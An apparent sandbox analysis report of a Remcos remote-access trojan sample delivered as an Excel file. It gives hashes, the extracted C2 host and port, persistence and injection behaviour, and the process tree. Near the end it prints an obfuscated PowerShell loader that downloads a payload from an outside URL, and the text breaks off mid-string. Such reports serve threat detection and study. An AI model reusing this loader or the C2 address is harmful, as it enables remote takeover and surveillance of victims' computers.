remcos | 15feeb12f8460eebe263ec750d08dd79e1d26b2704726223f0dc7c6bacd1506d

Analysis

max time kernel
149s
max time network
148s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
16-04-2024 07:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GMB.xls
Size

317KB
MD5

cb5d55cbdd70a44948d1f976af168a59
SHA1

07d995e60e3dbdabf23690014c3a4c74aa1e2139
SHA256

15feeb12f8460eebe263ec750d08dd79e1d26b2704726223f0dc7c6bacd1506d
SHA512

5064d95029d85d8b68947176bd08a186dc18e09e24ed1eebe977710ac399cc6c3a0babfd44bd69d0a3ce14f4840f72ab01acfe0b0d87c377ab1d2cc306fb8e37
SSDEEP

6144:LuunJk9CBY35qAOJl/YrLYz+WrNhZF+E+fgL+0dD8ivSbVd1MIhFjMaZ4EX0ikpM:LvJksA3bVd1MIXMa2EEL+B

Score

10^/10

remcos remotehost persistence rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

rmcnewlistening.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-AK1F22
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 6 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exe

flow pid process

26 2680 EQNEDT32.EXE
29 2276 WScript.exe
31 1612 powershell.exe
33 1612 powershell.exe
35 1612 powershell.exe
36 1612 powershell.exe
Abuses OpenXML format to download file from external location

flow	pid	process
26	2680	EQNEDT32.EXE
29	2276	WScript.exe
31	1612	powershell.exe
33	1612	powershell.exe
35	1612	powershell.exe
36	1612	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\RVC.vbs"	powershell.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1612 set thread context of 2732 1612 powershell.exe RegAsm.exe
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

2680 EQNEDT32.EXE

description	pid	process	target process
PID 1612 set thread context of 2732	1612	powershell.exe	RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

pid	process
2680	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXEWINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

3060 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2884 powershell.exe
1612 powershell.exe
2580 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2884 powershell.exe
Token: SeDebugPrivilege 1612 powershell.exe
Token: SeDebugPrivilege 2580 powershell.exe
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXEWINWORD.EXE

pid process

3060 EXCEL.EXE
3060 EXCEL.EXE
3060 EXCEL.EXE
2812 WINWORD.EXE
2812 WINWORD.EXE

pid	process
3060	EXCEL.EXE

pid	process
2884	powershell.exe
1612	powershell.exe
2580	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	2580	powershell.exe

pid	process
3060	EXCEL.EXE
3060	EXCEL.EXE
3060	EXCEL.EXE
2812	WINWORD.EXE
2812	WINWORD.EXE

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

EQNEDT32.EXEWINWORD.EXEWScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2680 wrote to memory of 2276	2680	EQNEDT32.EXE	WScript.exe
PID 2680 wrote to memory of 2276	2680	EQNEDT32.EXE	WScript.exe
PID 2680 wrote to memory of 2276	2680	EQNEDT32.EXE	WScript.exe
PID 2680 wrote to memory of 2276	2680	EQNEDT32.EXE	WScript.exe
PID 2812 wrote to memory of 580	2812	WINWORD.EXE	splwow64.exe
PID 2812 wrote to memory of 580	2812	WINWORD.EXE	splwow64.exe
PID 2812 wrote to memory of 580	2812	WINWORD.EXE	splwow64.exe
PID 2812 wrote to memory of 580	2812	WINWORD.EXE	splwow64.exe
PID 2276 wrote to memory of 2884	2276	WScript.exe	powershell.exe
PID 2276 wrote to memory of 2884	2276	WScript.exe	powershell.exe
PID 2276 wrote to memory of 2884	2276	WScript.exe	powershell.exe
PID 2276 wrote to memory of 2884	2276	WScript.exe	powershell.exe
PID 2884 wrote to memory of 1612	2884	powershell.exe	powershell.exe
PID 2884 wrote to memory of 1612	2884	powershell.exe	powershell.exe
PID 2884 wrote to memory of 1612	2884	powershell.exe	powershell.exe
PID 2884 wrote to memory of 1612	2884	powershell.exe	powershell.exe
PID 1612 wrote to memory of 2580	1612	powershell.exe	powershell.exe
PID 1612 wrote to memory of 2580	1612	powershell.exe	powershell.exe
PID 1612 wrote to memory of 2580	1612	powershell.exe	powershell.exe
PID 1612 wrote to memory of 2580	1612	powershell.exe	powershell.exe
PID 1612 wrote to memory of 2732	1612	powershell.exe	RegAsm.exe
PID 1612 wrote to memory of 2732	1612	powershell.exe	RegAsm.exe
PID 1612 wrote to memory of 2732	1612	powershell.exe	RegAsm.exe
PID 1612 wrote to memory of 2732	1612	powershell.exe	RegAsm.exe
PID 1612 wrote to memory of 2732	1612	powershell.exe	RegAsm.exe
PID 1612 wrote to memory of 2732	1612	powershell.exe	RegAsm.exe
PID 1612 wrote to memory of 2732	1612	powershell.exe	RegAsm.exe
PID 1612 wrote to memory of 2732	1612	powershell.exe	RegAsm.exe
PID 1612 wrote to memory of 2732	1612	powershell.exe	RegAsm.exe
PID 1612 wrote to memory of 2732	1612	powershell.exe	RegAsm.exe
PID 1612 wrote to memory of 2732	1612	powershell.exe	RegAsm.exe
PID 1612 wrote to memory of 2732	1612	powershell.exe	RegAsm.exe
PID 1612 wrote to memory of 2732	1612	powershell.exe	RegAsm.exe
PID 1612 wrote to memory of 2732	1612	powershell.exe	RegAsm.exe
PID 1612 wrote to memory of 2732	1612	powershell.exe	RegAsm.exe
PID 1612 wrote to memory of 2732	1612	powershell.exe	RegAsm.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\GMB.xls
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3060

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2812

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:580

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2680

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\loverskissingforimage.vbs"
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2276

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgT